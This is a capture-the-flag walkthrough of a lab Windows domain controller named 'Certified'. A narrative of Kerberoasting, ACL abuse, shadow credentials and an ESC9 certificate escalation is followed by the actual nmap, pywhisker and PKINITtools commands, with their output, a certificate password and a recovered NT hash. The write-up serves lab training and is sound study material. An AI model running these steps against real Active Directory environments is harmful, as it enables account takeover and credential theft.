As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
Recon
Starting off with an nmap syn scan over all ports:
sudo nmap -sS -Pn -n -p- 10.10.11.41 -oN all_syn.txt
#Output:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49683/tcp open unknown
49716/tcp open unknown
49739/tcp open unknown
55012/tcp open unknown
Using these ports to run over a vulnerability scan.
Enumeration
This looks to be a DC. Available ports for enumeration are LDAP, SMB.
I tried few ways, LDAP enumeration shows heavy AD CS. So we will use certipy:
This looks to be vulnerable:
Our user is not from the operator ca group:
Foothold
We are not in the group. Let's Kerberoast management_svc because ldap shows it is kerberoastable:
Let's sync our clocks:
Setting the clock to match it:
Let's run impacket again:
Uncrackable.
I tried various ways, but everything fails. Weird.
Bloodhound says we have WriteOwner Permissions over management@certified.htb:
I am trying to get this.
So, let's add name ourselves the new owner of the group:
Let's now add a new ACE that will give us WriteMembers over Management:
Let's now add ourselves in the group:
Verifying via LDAP query:
After few minutes/hours, I realized the path does not want us to change management_svc password, but maybe do a shadow credentials attack.
Sweeeeet!!! We got the pfx!
Let's get the damn TGT now!
Getting the NT Hash for management_svc:
PrivEsc
Change ca_operator password:
Let's get a pfx:
I checked the templates again as operator ca:
Ran ESC9 PrivEsc attack:
Setting the UPN of ca_operator to Administrator so that we can retrieve Administrator .pkx:
PORTS=$(grep "open" all_syn.txt | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'); sudo nmap -sVC -Pn -n -p ${PORTS} -oN vuln_scan.txt 10.10.11.41
#Output:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-28 01:57:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T01:59:01+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T01:59:00+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T01:59:01+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-04-28T01:59:00+00:00; +7h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
55012/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
pywhisker -d certified.htb -u "judith.mader" -p 'judith09' --target "management_svc" --action "add" --filename DC$
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 72aac68b-a642-54bc-762a-ffb8da93b1f0
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: DC$.pfx
[+] PFX exportiert nach: DC$.pfx
[i] Passwort für PFX: bQWW4lwVnl1BCxOFZyaF
[+] Saved PFX (#PKCS12) certificate & key at path: DC$.pfx
[*] Must be used with password: bQWW4lwVnl1BCxOFZyaF
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
python3 /home/czr/HTB/Timelapse/Enum/winrm/PKINITtools/gettgtpkinit.py -cert-pfx DC$.pfx -pfx-pass 'bQWW4lwVnl1BCxOFZyaF' 'certified.htb/management_svc' DC$.ccache
2025-04-28 07:56:57,074 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-28 07:56:57,104 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-28 07:57:18,779 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-28 07:57:18,779 minikerberos INFO f4f2c6c8b96c9117b0d5933334a73510fe5674a24719a208a0ff84ca58cc221d
INFO:minikerberos:f4f2c6c8b96c9117b0d5933334a73510fe5674a24719a208a0ff84ca58cc221d
2025-04-28 07:57:18,782 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
sudo python3 /home/czr/HTB/Timelapse/Enum/winrm/PKINITtools/getnthash.py -key f4f2c6c8b96c9117b0d5933334a73510fe5674a24719a208a0ff84ca58cc221d certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
